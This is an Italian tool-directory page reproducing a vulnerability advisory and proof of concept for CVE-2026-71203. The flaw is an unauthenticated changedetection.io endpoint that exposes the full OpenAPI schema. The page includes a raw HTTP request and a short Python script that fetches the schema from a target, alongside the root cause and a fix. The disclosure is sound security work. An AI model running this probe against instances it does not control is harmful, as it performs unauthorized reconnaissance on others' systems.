Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-71203-PoC — PoC: divulgazione non autenticata dello schema OpenAPI di changedetection.io (CVE-2026-71203, Medio 5.3) | Kitploit
Strumenti/GitHubGitHub/nel-droid/cve-2026-71203-poc
Analisi delle VulnerabilitàExploitTest di Sicurezza delle APIRaccolta InformazioniSicurezza WebPenetration TestingSicurezza delle API
GitHubnel-droid/cve-2026-71203-poc

CVE-2026-71203-PoC

PoC: divulgazione non autenticata dello schema OpenAPI di changedetection.io (CVE-2026-71203, Medio 5.3)

Vedi Repository
824 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-71203 — changedetection.io: Autenticazione mancante su /api/v1/full-spec divulga l'intero schema OpenAPI

Prodotto: dgtlmoon/changedetection.io — v0.55.7 File: changedetectionio/api/Spec.py CWE: CWE-306 — Autenticazione mancante per funzione critica CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N — 5.3 (Medio) CNA: Turan Security · Record CVE

Descrizione

Le risorse dell'API REST di changedetection.io sono protette da un decoratore @auth.check_token che valida l'header x-api-key del chiamante — ad eccezione della risorsa Spec registrata su /api/v1/full-spec (), il cui metodo non è dotato né di né di .

changedetectionio/api/Spec.py
get
@auth.check_token
@validate_openapi_request

Impatto

Qualsiasi client di rete non autenticato può recuperare lo schema OpenAPI completo dell'istanza, rivelando l'intera superficie API interna (tutti i percorsi delle risorse, i parametri e le forme delle risposte) senza presentare alcuna chiave API. Sebbene lo schema in sé non sia un dato utente sensibile, fornisce a un attaccante una mappa completa e autorevole di ogni altro endpoint API da prendere di mira — riducendo il costo di ulteriori attività di ricognizione contro le risorse effettivamente protette dell'istanza.

Riproduzione

root@kitploit:~
GET /api/v1/full-spec HTTP/1.1
Host: target-instance

Non è richiesto alcun header x-api-key, cookie o altra credenziale. La risposta è il documento completo delle specifiche OpenAPI.

Prova di concetto (Python):

root@kitploit:~
import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5000"

resp = requests.get(f"{target}/api/v1/full-spec", timeout=10)
print(f"[*] Status: {resp.status_code}")
if resp.status_code == 200:
    print("[+] Full OpenAPI schema disclosed with zero authentication:")
    print(resp.text[:1000])

Causa principale

Ogni altra risorsa REST dell'API è registrata con @auth.check_token (e @validate_openapi_request) applicato ai suoi metodi handler; il metodo get della risorsa Spec non è stato decorato allo stesso modo, lasciandolo come unico endpoint non autenticato in una superficie altrimenti protetta da chiave API.

Correzioni consigliate

Applica @auth.check_token a Spec.get() in modo coerente con ogni altra risorsa API; oppure, se lo schema è destinato a essere pubblico, rendi questa una decisione esplicita e documentata anziché un'incoerenza.

Scarica lo strumento